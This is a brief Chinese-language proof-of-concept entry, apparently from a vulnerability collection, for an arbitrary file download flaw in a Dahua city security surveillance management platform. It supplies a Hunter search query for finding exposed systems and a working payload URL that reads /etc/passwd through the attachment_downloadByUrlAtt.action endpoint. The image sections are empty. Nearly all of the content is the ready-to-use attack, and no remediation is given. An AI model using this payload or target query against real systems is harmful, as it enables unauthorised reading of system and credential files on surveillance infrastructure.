D5-1大华-城市安防监控系统平台管理-任意文件下载

漏洞描述：

大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件

网站图片:

网络测绘:

Hunter 语法:

• hunter：app.name==“Dahua 大华 DSS 视频管理系统”

  漏洞复现:

payload：

http://xx.xx.xx.xx/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd

效果图: